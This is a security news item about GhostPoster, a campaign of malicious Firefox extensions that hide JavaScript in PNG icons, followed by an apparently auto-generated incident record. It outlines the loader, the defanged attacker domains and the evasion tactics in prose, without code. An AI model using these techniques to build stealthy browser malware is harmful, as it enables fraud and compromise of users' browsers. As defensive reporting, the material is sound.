GhostPoster Campaign Exploits Firefox Extensions with Steganography, Infecting 50,000+ Users
Researchers at Koi have exposed GhostPoster, a large-scale malware campaign targeting Firefox users through malicious browser extensions. The attack leverages steganography hiding executable JavaScript within PNG icon files to evade detection, infecting over 50,000 users via seemingly legitimate add-ons.
The campaign spans at least 17 Firefox extensions, including Free VPN Forever (16,000+ installs), which remains available on the Firefox Add-ons marketplace. These extensions masquerade as benign tools offering VPN access, translation, weather updates, or ad blocking while delivering a multi-stage malware payload that compromises browser security.
How GhostPoster Works
- Initial Infection: Extensions load their icon files, which contain hidden JavaScript marked by a
===sequence. The code executes upon each extension load, bypassing static scans since the image appears normal. - Loader Stage: The embedded script retrieves additional payloads from attacker-controlled domains (liveupdt[.]com or dealctr[.]com), using a unique signature to track infections.
- Evasion Tactics: The malware checks in every 48 hours and downloads payloads just 10% of the time, making detection difficult. Payloads are obfuscated via Base64, XOR encryption, and runtime ID-based encoding, storing data in browser memory rather than disk.
- Browser Takeover: Once active, the malware hijacks affiliate links, injects tracking code (using Google Analytics IDs), strips security headers (e.g., Content-Security-Policy), and enables remote code execution. Additional capabilities include CAPTCHA bypass, ad fraud, and dynamic cleanup to avoid forensic traces.
Impact & Broader Trends
GhostPoster exploits user trust in browser extensions, a growing attack vector. By embedding malware in images and distributing it through official marketplaces, attackers bypass traditional security measures. The campaign highlights the risks of implicit trust in extensions, reinforcing the need for zero-trust principles in cybersecurity.
Firefox has not yet removed all affected extensions, leaving users vulnerable to persistent browser compromise.
Mozilla cybersecurity rating report: https://www.rankiteo.com/company/mozilla-corporation
"id": "MOZ1779280296",
"linkid": "mozilla-corporation",
"type": "Cyber Attack",
"date": "12/2025",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"{'affected_entities': [{'customers_affected': '50,000+',
'location': 'Global',
'name': 'Firefox Users',
'size': '50,000+ users',
'type': 'Individuals'},
{'industry': 'Technology',
'location': 'Global',
'name': 'Firefox Add-ons Marketplace',
'type': 'Software Distribution Platform'}],
'attack_vector': 'Malicious Browser Extensions',
'data_breach': {'data_exfiltration': 'Possible (payloads retrieved from '
'attacker-controlled domains)',
'file_types_exposed': 'PNG (with embedded JavaScript), '
'obfuscated payloads (Base64, XOR, '
'runtime ID-based encoding)',
'sensitivity_of_data': 'Medium (browser activity, tracking '
'data)',
'type_of_data_compromised': 'Browser session data, tracking '
'information, potential remote '
'access'},
'description': 'Researchers at Koi have exposed GhostPoster, a large-scale '
'malware campaign targeting Firefox users through malicious '
'browser extensions. The attack leverages steganography hiding '
'executable JavaScript within PNG icon files to evade '
'detection, infecting over 50,000 users via seemingly '
'legitimate add-ons. The campaign spans at least 17 Firefox '
'extensions, including Free VPN Forever (16,000+ installs), '
'which remains available on the Firefox Add-ons marketplace. '
'These extensions masquerade as benign tools offering VPN '
'access, translation, weather updates, or ad blocking while '
'delivering a multi-stage malware payload that compromises '
'browser security.',
'impact': {'brand_reputation_impact': 'Erosion of user trust in Firefox '
'extensions and marketplace security',
'data_compromised': 'Browser session data, tracking information, '
'potential remote code execution access',
'operational_impact': 'Browser security compromise, affiliate '
'fraud, ad injection, CAPTCHA bypass',
'systems_affected': 'Firefox browsers with malicious extensions '
'installed'},
'initial_access_broker': {'backdoors_established': 'Persistent browser '
'compromise via remote '
'payloads',
'entry_point': 'Malicious Firefox extensions'},
'investigation_status': 'Ongoing (extensions still available on Firefox '
'Add-ons marketplace)',
'lessons_learned': 'The incident highlights the risks of implicit trust in '
'browser extensions and the need for zero-trust principles '
'in cybersecurity. Steganography and evasion tactics like '
'low-frequency payload downloads make detection difficult. '
'Stricter vetting of extensions in marketplaces is '
'necessary.',
'motivation': 'Financial gain (affiliate link hijacking, ad fraud), data '
'exfiltration, remote code execution',
'post_incident_analysis': {'corrective_actions': 'Firefox should remove '
'malicious extensions, '
'improve extension review '
'processes, and implement '
'runtime monitoring for '
'suspicious behavior',
'root_causes': 'Lack of strict vetting for Firefox '
'extensions, exploitation of '
'steganography to hide malicious '
'code, user trust in '
'marketplace-distributed '
'extensions'},
'recommendations': ['Implement zero-trust principles for browser extensions',
'Enhance marketplace vetting processes for extensions',
'Monitor for steganography-based attacks in browser '
'environments',
'Educate users on the risks of malicious extensions',
'Deploy behavioral analysis tools to detect anomalous '
'extension activity'],
'references': [{'source': 'Koi Research'}],
'response': {'third_party_assistance': 'Koi (researchers)'},
'threat_actor': 'GhostPoster Campaign',
'title': 'GhostPoster Campaign Exploits Firefox Extensions with '
'Steganography, Infecting 50,000+ Users',
'type': 'Malware Campaign',
'vulnerability_exploited': 'Steganography (hidden JavaScript in PNG files), '
'lack of strict extension vetting'}